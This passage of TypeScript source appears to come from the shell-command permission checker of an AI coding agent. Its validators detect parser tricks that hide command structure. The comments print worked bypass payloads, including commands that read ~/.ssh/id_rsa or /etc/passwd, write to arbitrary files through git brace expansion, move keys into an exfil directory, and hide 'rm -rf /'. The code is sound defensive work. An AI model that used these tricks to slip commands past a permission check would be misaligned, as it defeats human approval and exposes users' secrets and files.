// Also handle flags that start with quotes: "--"output, '-'-output, etc.
|
|
// Use fullyUnquotedContent to avoid false positives from legitimate quoted content like echo "---"
|
|
if (/\s['"`]-/.test(context.fullyUnquotedContent)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 2,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Command contains quoted characters in flag names',
|
|
}
|
|
}
|
|
|
|
// Also handles cases like ""--output
|
|
// Use fullyUnquotedContent to avoid false positives from legitimate quoted content
|
|
if (/['"`]{2}-/.test(context.fullyUnquotedContent)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 3,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Command contains quoted characters in flag names',
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'No obfuscated flags detected' }
|
|
}
|
|
|
|
/**
|
|
* Detects backslash-escaped whitespace characters (space, tab) outside of quotes.
|
|
*
|
|
* In bash, `echo\ test` is a single token (command named "echo test"), but
|
|
* shell-quote decodes the escape and produces `echo test` (two separate tokens).
|
|
* This discrepancy allows path traversal attacks like:
|
|
* echo\ test/../../../usr/bin/touch /tmp/file
|
|
* which the parser sees as `echo test/.../touch /tmp/file` (an echo command)
|
|
* but bash resolves as `/usr/bin/touch /tmp/file` (via directory "echo test").
|
|
*/
|
|
function hasBackslashEscapedWhitespace(command: string): boolean {
|
|
let inSingleQuote = false
|
|
let inDoubleQuote = false
|
|
|
|
for (let i = 0; i < command.length; i++) {
|
|
const char = command[i]
|
|
|
|
if (char === '\\' && !inSingleQuote) {
|
|
if (!inDoubleQuote) {
|
|
const nextChar = command[i + 1]
|
|
if (nextChar === ' ' || nextChar === '\t') {
|
|
return true
|
|
}
|
|
}
|
|
// Skip the escaped character (both outside quotes and inside double quotes,
|
|
// where \\, \", \$, \` are valid escape sequences)
|
|
i++
|
|
continue
|
|
}
|
|
|
|
if (char === '"' && !inSingleQuote) {
|
|
inDoubleQuote = !inDoubleQuote
|
|
continue
|
|
}
|
|
|
|
if (char === "'" && !inDoubleQuote) {
|
|
inSingleQuote = !inSingleQuote
|
|
continue
|
|
}
|
|
}
|
|
|
|
return false
|
|
}
|
|
|
|
function validateBackslashEscapedWhitespace(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
if (hasBackslashEscapedWhitespace(context.originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.BACKSLASH_ESCAPED_WHITESPACE,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains backslash-escaped whitespace that could alter command parsing',
|
|
}
|
|
}
|
|
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'No backslash-escaped whitespace',
|
|
}
|
|
}
|
|
|
|
/**
|
|
* Detects a backslash immediately preceding a shell operator outside of quotes.
|
|
*
|
|
* SECURITY: splitCommand normalizes `\;` to a bare `;` in its output string.
|
|
* When downstream code (checkReadOnlyConstraints, checkPathConstraints, etc.)
|
|
* re-parses that normalized string, the bare `;` is seen as an operator and
|
|
* causes a false split. This enables arbitrary file read bypassing path checks:
|
|
*
|
|
* cat safe.txt \; echo ~/.ssh/id_rsa
|
|
*
|
|
* In bash: ONE cat command reading safe.txt, ;, echo, ~/.ssh/id_rsa as files.
|
|
* After splitCommand normalizes: "cat safe.txt ; echo ~/.ssh/id_rsa"
|
|
* Nested re-parse: ["cat safe.txt", "echo ~/.ssh/id_rsa"] — both segments
|
|
* pass isCommandReadOnly, sensitive path hidden in echo segment is never
|
|
* validated by path constraints. Auto-allowed. Private key leaked.
|
|
*
|
|
* This check flags any \<operator> regardless of backslash parity. Even counts
|
|
* (\\;) are dangerous in bash (\\ → \, ; separates). Odd counts (\;) are safe
|
|
* in bash but trigger the double-parse bug above. Both must be flagged.
|
|
*
|
|
* Known false positive: `find . -exec cmd {} \;` — users will be prompted once.
|
|
*
|
|
* Note: `(` and `)` are NOT in this set — splitCommand preserves `\(` and `\)`
|
|
* in its output (round-trip safe), so they don't trigger the double-parse bug.
|
|
* This allows `find . \( -name x -o -name y \)` to pass without false positives.
|
|
*/
|
|
const SHELL_OPERATORS = new Set([';', '|', '&', '<', '>'])
|
|
|
|
function hasBackslashEscapedOperator(command: string): boolean {
|
|
let inSingleQuote = false
|
|
let inDoubleQuote = false
|
|
|
|
for (let i = 0; i < command.length; i++) {
|
|
const char = command[i]
|
|
|
|
// SECURITY: Handle backslash FIRST, before quote toggles. In bash, inside
|
|
// double quotes, `\"` is an escape sequence producing a literal `"` — it
|
|
// does NOT close the quote. If we process quote toggles first, `\"` inside
|
|
// `"..."` desyncs the tracker:
|
|
// - `\` is ignored (gated by !inDoubleQuote)
|
|
// - `"` toggles inDoubleQuote to FALSE (wrong — bash says still inside)
|
|
// - next `"` (the real closing quote) toggles BACK to TRUE — locked desync
|
|
// - subsequent `\;` is missed because !inDoubleQuote is false
|
|
// Exploit: `tac "x\"y" \; echo ~/.ssh/id_rsa` — bash runs ONE tac reading
|
|
// all args as files (leaking id_rsa), but desynced tracker misses `\;` and
|
|
// splitCommand's double-parse normalization "sees" two safe commands.
|
|
//
|
|
// Fix structure matches hasBackslashEscapedWhitespace (which was correctly
|
|
// fixed for this in commit prior to d000dfe84e): backslash check first,
|
|
// gated only by !inSingleQuote (since backslash IS literal inside '...'),
|
|
// unconditional i++ to skip the escaped char even inside double quotes.
|
|
if (char === '\\' && !inSingleQuote) {
|
|
// Only flag \<operator> when OUTSIDE double quotes (inside double quotes,
|
|
// operators like ;|&<> are already not special, so \; is harmless there).
|
|
if (!inDoubleQuote) {
|
|
const nextChar = command[i + 1]
|
|
if (nextChar && SHELL_OPERATORS.has(nextChar)) {
|
|
return true
|
|
}
|
|
}
|
|
// Skip the escaped character unconditionally. Inside double quotes, this
|
|
// correctly consumes backslash pairs: `"x\\"` → pos 6 (`\`) skips pos 7
|
|
// (`\`), then pos 8 (`"`) toggles inDoubleQuote off correctly. Without
|
|
// unconditional skip, pos 7 would see `\`, see pos 8 (`"`) as nextChar,
|
|
// skip it, and the closing quote would NEVER toggle inDoubleQuote —
|
|
// permanently desyncing and missing subsequent `\;` outside quotes.
|
|
// Exploit: `cat "x\\" \; echo /etc/passwd` — bash reads /etc/passwd.
|
|
//
|
|
// This correctly handles backslash parity: odd-count `\;` (1, 3, 5...)
|
|
// is flagged (the unpaired `\` before `;` is detected). Even-count `\\;`
|
|
// (2, 4...) is NOT flagged, which is CORRECT — bash treats `\\` as
|
|
// literal `\` and `;` as a separator, so splitCommand handles it
|
|
// normally (no double-parse bug). This matches
|
|
// hasBackslashEscapedWhitespace line ~1340.
|
|
i++
|
|
continue
|
|
}
|
|
|
|
// Quote toggles come AFTER backslash handling (backslash already skipped
|
|
// any escaped quote char, so these toggles only fire on unescaped quotes).
|
|
if (char === "'" && !inDoubleQuote) {
|
|
inSingleQuote = !inSingleQuote
|
|
continue
|
|
}
|
|
if (char === '"' && !inSingleQuote) {
|
|
inDoubleQuote = !inDoubleQuote
|
|
continue
|
|
}
|
|
}
|
|
|
|
return false
|
|
}
|
|
|
|
function validateBackslashEscapedOperators(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
// Tree-sitter path: if tree-sitter confirms no actual operator nodes exist
|
|
// in the AST, then any \; is just an escaped character in a word argument
|
|
// (e.g., `find . -exec cmd {} \;`). Skip the expensive regex check.
|
|
if (context.treeSitter && !context.treeSitter.hasActualOperatorNodes) {
|
|
return { behavior: 'passthrough', message: 'No operator nodes in AST' }
|
|
}
|
|
|
|
if (hasBackslashEscapedOperator(context.originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.BACKSLASH_ESCAPED_OPERATORS,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains a backslash before a shell operator (;, |, &, <, >) which can hide command structure',
|
|
}
|
|
}
|
|
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'No backslash-escaped operators',
|
|
}
|
|
}
|
|
|
|
/**
|
|
* Checks if a character at position `pos` in `content` is escaped by counting
|
|
* consecutive backslashes before it. An odd number means it's escaped.
|
|
*/
|
|
function isEscapedAtPosition(content: string, pos: number): boolean {
|
|
let backslashCount = 0
|
|
let i = pos - 1
|
|
while (i >= 0 && content[i] === '\\') {
|
|
backslashCount++
|
|
i--
|
|
}
|
|
return backslashCount % 2 === 1
|
|
}
|
|
|
|
/**
|
|
* Detects unquoted brace expansion syntax that Bash expands but shell-quote/tree-sitter
|
|
* treat as literal strings. This parsing discrepancy allows permission bypass:
|
|
* git ls-remote {--upload-pack="touch /tmp/test",test}
|
|
* Parser sees one literal arg, but Bash expands to: --upload-pack="touch /tmp/test" test
|
|
*
|
|
* Brace expansion has two forms:
|
|
* 1. Comma-separated: {a,b,c} → a b c
|
|
* 2. Sequence: {1..5} → 1 2 3 4 5
|
|
*
|
|
* Both single and double quotes suppress brace expansion in Bash, so we use
|
|
* fullyUnquotedContent which has both quote types stripped.
|
|
* Backslash-escaped braces (\{, \}) also suppress expansion.
|
|
*/
|
|
function validateBraceExpansion(context: ValidationContext): PermissionResult {
|
|
// Use pre-strip content to avoid false negatives from stripSafeRedirections
|
|
// creating backslash adjacencies (e.g., `\>/dev/null{a,b}` → `\{a,b}` after
|
|
// stripping, making isEscapedAtPosition think the brace is escaped).
|
|
const content = context.fullyUnquotedPreStrip
|
|
|
|
// SECURITY: Check for MISMATCHED brace counts in fullyUnquoted content.
|
|
// A mismatch indicates that quoted braces (e.g., `'{'` or `"{"`) were
|
|
// stripped by extractQuotedContent, leaving unbalanced braces in the content
|
|
// we analyze. Our depth-matching algorithm below assumes balanced braces —
|
|
// with a mismatch, it closes at the WRONG position, missing commas that
|
|
// bash's algorithm WOULD find.
|
|
//
|
|
// Exploit: `git diff {@'{'0},--output=/tmp/pwned}`
|
|
// - Original: 2 `{`, 2 `}` (quoted `'{'` counts as content, not operator)
|
|
// - fullyUnquoted: `git diff {@0},--output=/tmp/pwned}` — 1 `{`, 2 `}`!
|
|
// - Our depth-matcher: closes at first `}` (after `0`), inner=`@0`, no `,`
|
|
// - Bash (on original): quoted `{` is content; first unquoted `}` has no
|
|
// `,` yet → bash treats as literal content, keeps scanning → finds `,`
|
|
// → final `}` closes → expands to `@{0} --output=/tmp/pwned`
|
|
// - git writes diff to /tmp/pwned. ARBITRARY FILE WRITE, ZERO PERMISSIONS.
|
|
//
|
|
// We count ONLY unescaped braces (backslash-escaped braces are literal in
|
|
// bash). If counts mismatch AND at least one unescaped `{` exists, block —
|
|
// our depth-matching cannot be trusted on this content.
|
|
let unescapedOpenBraces = 0
|
|
let unescapedCloseBraces = 0
|
|
for (let i = 0; i < content.length; i++) {
|
|
if (content[i] === '{' && !isEscapedAtPosition(content, i)) {
|
|
unescapedOpenBraces++
|
|
} else if (content[i] === '}' && !isEscapedAtPosition(content, i)) {
|
|
unescapedCloseBraces++
|
|
}
|
|
}
|
|
// Only block when CLOSE count EXCEEDS open count — this is the specific
|
|
// attack signature. More `}` than `{` means a quoted `{` was stripped
|
|
// (bash saw it as content, we see extra `}` unaccounted for). The inverse
|
|
// (more `{` than `}`) is usually legitimate unclosed/escaped braces like
|
|
// `{foo` or `{a,b\}` where bash doesn't expand anyway.
|
|
if (unescapedOpenBraces > 0 && unescapedCloseBraces > unescapedOpenBraces) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,
|
|
subId: 2,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command has excess closing braces after quote stripping, indicating possible brace expansion obfuscation',
|
|
}
|
|
}
|
|
|
|
// SECURITY: Additionally, check the ORIGINAL command (before quote stripping)
|
|
// for `'{'` or `"{"` INSIDE an unquoted brace context — this is the specific
|
|
// attack primitive. A quoted brace inside an outer unquoted `{...}` is
|
|
// essentially always an obfuscation attempt; legitimate commands don't nest
|
|
// quoted braces inside brace expansion (awk/find patterns are fully quoted,
|
|
// like `awk '{print $1}'` where the OUTER brace is inside quotes too).
|
|
//
|
|
// This catches the attack even if an attacker crafts a payload with balanced
|
|
// stripped braces (defense-in-depth). We use a simple heuristic: if the
|
|
// original command has `'{'` or `'}'` or `"{"` or `"}"` (quoted single brace)
|
|
// AND also has an unquoted `{`, that's suspicious.
|
|
if (unescapedOpenBraces > 0) {
|
|
const orig = context.originalCommand
|
|
// Look for quoted single-brace patterns: '{', '}', "{", "}"
|
|
// These are the attack primitive — a brace char wrapped in quotes.
|
|
if (/['"][{}]['"]/.test(orig)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,
|
|
subId: 3,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains quoted brace character inside brace context (potential brace expansion obfuscation)',
|
|
}
|
|
}
|
|
}
|
|
|
|
// Scan for unescaped `{` characters, then check if they form brace expansion.
|
|
// We use a manual scan rather than a simple regex lookbehind because
|
|
// lookbehinds can't handle double-escaped backslashes (\\{ is unescaped `{`).
|
|
for (let i = 0; i < content.length; i++) {
|
|
if (content[i] !== '{') continue
|
|
if (isEscapedAtPosition(content, i)) continue
|
|
|
|
// Find matching unescaped `}` by tracking nesting depth.
|
|
// Previous approach broke on nested `{`, missing commas between the outer
|
|
// `{` and the nested one (e.g., `{--upload-pack="evil",{test}}`).
|
|
let depth = 1
|
|
let matchingClose = -1
|
|
for (let j = i + 1; j < content.length; j++) {
|
|
const ch = content[j]
|
|
if (ch === '{' && !isEscapedAtPosition(content, j)) {
|
|
depth++
|
|
} else if (ch === '}' && !isEscapedAtPosition(content, j)) {
|
|
depth--
|
|
if (depth === 0) {
|
|
matchingClose = j
|
|
break
|
|
}
|
|
}
|
|
}
|
|
|
|
if (matchingClose === -1) continue
|
|
|
|
// Check for `,` or `..` at the outermost nesting level between this
|
|
// `{` and its matching `}`. Only depth-0 triggers matter — bash splits
|
|
// brace expansion at outer-level commas/sequences.
|
|
let innerDepth = 0
|
|
for (let k = i + 1; k < matchingClose; k++) {
|
|
const ch = content[k]
|
|
if (ch === '{' && !isEscapedAtPosition(content, k)) {
|
|
innerDepth++
|
|
} else if (ch === '}' && !isEscapedAtPosition(content, k)) {
|
|
innerDepth--
|
|
} else if (innerDepth === 0) {
|
|
if (
|
|
ch === ',' ||
|
|
(ch === '.' && k + 1 < matchingClose && content[k + 1] === '.')
|
|
) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains brace expansion that could alter command parsing',
|
|
}
|
|
}
|
|
}
|
|
}
|
|
// No expansion at this level — don't skip past; inner pairs will be
|
|
// caught by subsequent iterations of the outer loop.
|
|
}
|
|
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'No brace expansion detected',
|
|
}
|
|
}
|
|
|
|
// Matches Unicode whitespace characters that shell-quote treats as word
|
|
// separators but bash treats as literal word content. While this differential
|
|
// is defense-favorable (shell-quote over-splits), blocking these proactively
|
|
// prevents future edge cases.
|
|
// eslint-disable-next-line no-misleading-character-class
|
|
const UNICODE_WS_RE =
|
|
/[\u00A0\u1680\u2000-\u200A\u2028\u2029\u202F\u205F\u3000\uFEFF]/
|
|
|
|
function validateUnicodeWhitespace(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
const { originalCommand } = context
|
|
if (UNICODE_WS_RE.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.UNICODE_WHITESPACE,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains Unicode whitespace characters that could cause parsing inconsistencies',
|
|
}
|
|
}
|
|
return { behavior: 'passthrough', message: 'No Unicode whitespace' }
|
|
}
|
|
|
|
function validateMidWordHash(context: ValidationContext): PermissionResult {
|
|
const { unquotedKeepQuoteChars } = context
|
|
// Match # preceded by a non-whitespace character (mid-word hash).
|
|
// shell-quote treats mid-word # as comment-start but bash treats it as a
|
|
// literal character, creating a parser differential.
|
|
//
|
|
// Uses unquotedKeepQuoteChars (which preserves quote delimiters but strips
|
|
// quoted content) to catch quote-adjacent # like 'x'# — fullyUnquotedPreStrip
|
|
// would strip both quotes and content, turning 'x'# into just # (word-start).
|
|
//
|
|
// SECURITY: Also check the CONTINUATION-JOINED version. The context is built
|
|
// from the original command (pre-continuation-join). For `foo\<NL>#bar`,
|
|
// pre-join the `#` is preceded by `\n` (whitespace → `/\S#/` doesn't match),
|
|
// but post-join it's preceded by `o` (non-whitespace → matches). shell-quote
|
|
// operates on the post-join text (line continuations are joined in
|
|
// splitCommand), so the parser differential manifests on the joined text.
|
|
// While not directly exploitable (the `#...` fragment still prompts as its
|
|
// own subcommand), this is a defense-in-depth gap — shell-quote would drop
|
|
// post-`#` content from path extraction.
|
|
//
|
|
// Exclude ${# which is bash string-length syntax (e.g., ${#var}).
|
|
// Note: the lookbehind must be placed immediately before # (not before \S)
|
|
// so that it checks the correct 2-char window.
|
|
const joined = unquotedKeepQuoteChars.replace(/\\+\n/g, match => {
|
|
const backslashCount = match.length - 1
|
|
return backslashCount % 2 === 1 ? '\\'.repeat(backslashCount - 1) : match
|
|
})
|
|
if (
|
|
// eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() with atom search: fast when # absent
|
|
/\S(?<!\$\{)#/.test(unquotedKeepQuoteChars) ||
|
|
// eslint-disable-next-line custom-rules/no-lookbehind-regex -- same as above
|
|
/\S(?<!\$\{)#/.test(joined)
|
|
) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.MID_WORD_HASH,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains mid-word # which is parsed differently by shell-quote vs bash',
|
|
}
|
|
}
|
|
return { behavior: 'passthrough', message: 'No mid-word hash' }
|
|
}
|
|
|
|
/**
|
|
* Detects when a `#` comment contains quote characters that would desync
|
|
* downstream quote trackers (like extractQuotedContent).
|
|
*
|
|
* In bash, everything after an unquoted `#` on a line is a comment — quote
|
|
* characters inside the comment are literal text, not quote toggles. But our
|
|
* quote-tracking functions don't handle comments, so a `'` or `"` after `#`
|
|
* toggles their quote state. Attackers can craft `# ' "` sequences that
|
|
* precisely desync the tracker, causing subsequent content (on following
|
|
* lines) to appear "inside quotes" when it's actually unquoted in bash.
|
|
*
|
|
* Example attack:
|
|
* echo "it's" # ' " <<'MARKER'\n
|
|
* rm -rf /\n
|
|
* MARKER
|
|
* In bash: `#` starts a comment, `rm -rf /` executes on line 2.
|
|
* In extractQuotedContent: the `'` at position 14 (after #) opens a single
|
|
* quote, and the `'` before MARKER closes it. But the `'` after MARKER opens
|
|
* ANOTHER single quote, swallowing the newline and `rm -rf /`, so
|
|
* validateNewlines sees no unquoted newlines.
|
|
*
|
|
* Defense: If we see an unquoted `#` followed by any quote character on the
|
|
* same line, treat it as a misparsing concern. Legitimate commands rarely
|
|
* have quote characters in their comments (and if they do, the user can
|
|
* approve manually).
|
|
*/
|
|
function validateCommentQuoteDesync(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
// Tree-sitter path: tree-sitter correctly identifies comment nodes and
|
|
// quoted content. The desync concern is about regex quote tracking being
|
|
// confused by quote characters inside comments. When tree-sitter provides
|
|
// the quote context, this desync cannot happen — the AST is authoritative
|
|
// regardless of whether the command contains a comment.
|
|
if (context.treeSitter) {
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'Tree-sitter quote context is authoritative',
|
|
}
|
|
}
|
|
|
|
const { originalCommand } = context
|
|
|
|
// Track quote state character-by-character using the same (correct) logic
|
|
// as extractQuotedContent: single quotes don't toggle inside double quotes.
|
|
// When we encounter an unquoted `#`, check if the rest of the line (until
|
|
// newline) contains any quote characters.
|
|
let inSingleQuote = false
|
|
let inDoubleQuote = false
|
|
let escaped = false
|
|
|
|
for (let i = 0; i < originalCommand.length; i++) {
|
|
const char = originalCommand[i]
|
|
|
|
if (escaped) {
|
|
escaped = false
|
|
continue
|
|
}
|
|
|
|
if (inSingleQuote) {
|
|
if (char === "'") inSingleQuote = false
|
|
continue
|
|
}
|
|
|
|
if (char === '\\') {
|
|
escaped = true
|
|
continue
|
|
}
|
|
|
|
if (inDoubleQuote) {
|
|
if (char === '"') inDoubleQuote = false
|
|
// Single quotes inside double quotes are literal — no toggle
|
|
continue
|
|
}
|
|
|
|
if (char === "'") {
|
|
inSingleQuote = true
|
|
continue
|
|
}
|
|
|
|
if (char === '"') {
|
|
inDoubleQuote = true
|
|
continue
|
|
}
|
|
|
|
// Unquoted `#` — in bash, this starts a comment. Check if the rest of
|
|
// the line contains quote characters that would desync other trackers.
|
|
if (char === '#') {
|
|
const lineEnd = originalCommand.indexOf('\n', i)
|
|
const commentText = originalCommand.slice(
|
|
i + 1,
|
|
lineEnd === -1 ? originalCommand.length : lineEnd,
|
|
)
|
|
if (/['"]/.test(commentText)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.COMMENT_QUOTE_DESYNC,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains quote characters inside a # comment which can desync quote tracking',
|
|
}
|
|
}
|
|
// Skip to end of line (rest is comment)
|
|
if (lineEnd === -1) break
|
|
i = lineEnd // Loop increment will move past newline
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'No comment quote desync' }
|
|
}
|
|
|
|
/**
|
|
* Detects a newline inside a quoted string where the NEXT line would be
|
|
* stripped by stripCommentLines (trimmed line starts with `#`).
|
|
*
|
|
* In bash, `\n` inside quotes is a literal character and part of the argument.
|
|
* But stripCommentLines (called by stripSafeWrappers in bashPermissions before
|
|
* path validation and rule matching) processes commands LINE-BY-LINE via
|
|
* `command.split('\n')` without tracking quote state. A quoted newline lets an
|
|
* attacker position the next line to start with `#` (after trim), causing
|
|
* stripCommentLines to drop that line entirely — hiding sensitive paths or
|
|
* arguments from path validation and permission rule matching.
|
|
*
|
|
* Example attack (auto-allowed in acceptEdits mode without any Bash rules):
|
|
* mv ./decoy '<\n>#' ~/.ssh/id_rsa ./exfil_dir
|
|
* Bash: moves ./decoy AND ~/.ssh/id_rsa into ./exfil_dir/ (errors on `\n#`).
|
|
* stripSafeWrappers: line 2 starts with `#` → stripped → "mv ./decoy '".
|
|
* shell-quote: drops unbalanced trailing quote → ["mv", "./decoy"].
|
|
* checkPathConstraints: only sees ./decoy (in cwd) → passthrough.
|
|
* acceptEdits mode: mv with all-cwd paths → ALLOW. Zero clicks, no warning.
|
|
*
|
|
* Also works with cp (exfil), rm/rm -rf (delete arbitrary files/dirs).
|
|
*
|
|
* Defense: block ONLY the specific stripCommentLines trigger — a newline inside
|
|
* quotes where the next line starts with `#` after trim. This is the minimal
|
|
* check that catches the parser differential while preserving legitimate
|
|
* multi-line quoted arguments (echo 'line1\nline2', grep patterns, etc.).
|
|
* Safe heredocs ($(cat <<'EOF'...)) and git commit -m "..." are handled by
|
|
* early validators and never reach this check.
|
|
*
|
|
* This validator is NOT in nonMisparsingValidators — its ask result gets
|
|
* isBashSecurityCheckForMisparsing: true, causing an early block in the
|
|
* permission flow at bashPermissions.ts before any line-based processing runs.
|
|
*/
|
|
function validateQuotedNewline(context: ValidationContext): PermissionResult {
|
|
const { originalCommand } = context
|
|
|
|
// Fast path: must have both a newline byte AND a # character somewhere.
|
|
// stripCommentLines only strips lines where trim().startsWith('#'), so
|
|
// no # means no possible trigger.
|
|
if (!originalCommand.includes('\n') || !originalCommand.includes('#')) {
|
|
return { behavior: 'passthrough', message: 'No newline or no hash' }
|
|
}
|
|
|
|
// Track quote state. Mirrors extractQuotedContent / validateCommentQuoteDesync:
|
|
// - single quotes don't toggle inside double quotes
|
|
// - backslash escapes the next char (but not inside single quotes)
|
|
// stripCommentLines splits on '\n' (not \r), so we only treat \n as a line
|
|
// separator. \r inside a line is removed by trim() and doesn't change the
|
|
// trimmed-starts-with-# check.
|
|
let inSingleQuote = false
|
|
let inDoubleQuote = false
|
|
let escaped = false
|
|
|
|
for (let i = 0; i < originalCommand.length; i++) {
|
|
const char = originalCommand[i]
|
|
|
|
if (escaped) {
|
|
escaped = false
|
|
continue
|
|
}
|
|
|
|
if (char === '\\' && !inSingleQuote) {
|
|
escaped = true
|
|
continue
|
|
}
|
|
|
|
if (char === "'" && !inDoubleQuote) {
|
|
inSingleQuote = !inSingleQuote
|
|
continue
|
|
}
|
|
|
|
if (char === '"' && !inSingleQuote) {
|
|
inDoubleQuote = !inDoubleQuote
|
|
continue
|
|
}
|
|
|
|
// A newline inside quotes: the NEXT line (from bash's perspective) starts
|
|
// inside a quoted string. Check if that line would be stripped by
|
|
// stripCommentLines — i.e., after trim(), does it start with `#`?
|
|
// This exactly mirrors: lines.filter(l => !l.trim().startsWith('#'))
|
|
if (char === '\n' && (inSingleQuote || inDoubleQuote)) {
|
|
const lineStart = i + 1
|
|
const nextNewline = originalCommand.indexOf('\n', lineStart)
|
|
const lineEnd = nextNewline === -1 ? originalCommand.length : nextNewline
|
|
const nextLine = originalCommand.slice(lineStart, lineEnd)
|
|
if (nextLine.trim().startsWith('#')) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.QUOTED_NEWLINE,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains a quoted newline followed by a #-prefixed line, which can hide arguments from line-based permission checks',
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'No quoted newline-hash pattern' }
|
|
}
|
|
|
|
/**
|
|
* Validates that the command doesn't use Zsh-specific dangerous commands that
|
|
* can bypass security checks. These commands provide capabilities like loading
|
|
* kernel modules, raw file I/O, network access, and pseudo-terminal execution
|
|
* that circumvent normal permission checks.
|
|
*
|
|
* Also catches `fc -e` which can execute arbitrary editors on command history,
|
|
* and `emulate` which with `-c` is an eval-equivalent.
|
|
*/
|
|
function validateZshDangerousCommands(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
const { originalCommand } = context
|
|
|
|
// Extract the base command from the original command, stripping leading
|
|
// whitespace, env var assignments, and Zsh precommand modifiers.
|
|
// e.g., "FOO=bar command builtin zmodload" -> "zmodload"
|
|
const ZSH_PRECOMMAND_MODIFIERS = new Set([
|
|
'command',
|
|
'builtin',
|
|
'noglob',
|
|
'nocorrect',
|
|
])
|
|
const trimmed = originalCommand.trim()
|
|
const tokens = trimmed.split(/\s+/)
|
|
let baseCmd = ''
|
|
for (const token of tokens) {
|
|
// Skip env var assignments (VAR=value)
|
|
if (/^[A-Za-z_]\w*=/.test(token)) continue
|
|
// Skip Zsh precommand modifiers (they don't change what command runs)
|
|
if (ZSH_PRECOMMAND_MODIFIERS.has(token)) continue
|
|
baseCmd = token
|
|
break
|
|
}
|
|
|
|
if (ZSH_DANGEROUS_COMMANDS.has(baseCmd)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.ZSH_DANGEROUS_COMMANDS,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: `Command uses Zsh-specific '${baseCmd}' which can bypass security checks`,
|
|
}
|
|
}
|
|
|
|
// Check for `fc -e` which allows executing arbitrary commands via editor
|
|
// fc without -e is safe (just lists history), but -e specifies an editor
|
|
// to run on the command, effectively an eval
|
|
if (baseCmd === 'fc' && /\s-\S*e/.test(trimmed)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.ZSH_DANGEROUS_COMMANDS,
|
|
subId: 2,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
"Command uses 'fc -e' which can execute arbitrary commands via editor",
|
|
}
|
|
}
|
|
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'No Zsh dangerous commands',
|
|
}
|
|
}
|
|
|
|
// Matches non-printable control characters that have no legitimate use in shell
|
|
// commands: 0x00-0x08, 0x0B-0x0C, 0x0E-0x1F, 0x7F. Excludes tab (0x09),
|
|
// newline (0x0A), and carriage return (0x0D) which are handled by other
|
|
// validators. Bash silently drops null bytes and ignores most control chars,
|
|
// so an attacker can use them to slip metacharacters past our checks while
|
|
// bash still executes them (e.g., "echo safe\x00; rm -rf /").
|
|
// eslint-disable-next-line no-control-regex
|
|
const CONTROL_CHAR_RE = /[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/
|
|
|
|
/**
|
|
* @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is
|
|
* unavailable. The primary gate is parseForSecurity (ast.ts).
|
|
*/
|
|
export function bashCommandIsSafe_DEPRECATED(
|
|
command: string,
|
|
): PermissionResult {
|
|
// SECURITY: Block control characters before any other processing. Null bytes
|
|
// and other non-printable chars are silently dropped by bash but confuse our
|
|
// validators, allowing metacharacters adjacent to them to slip through.
|
|
if (CONTROL_CHAR_RE.test(command)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.CONTROL_CHARACTERS,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
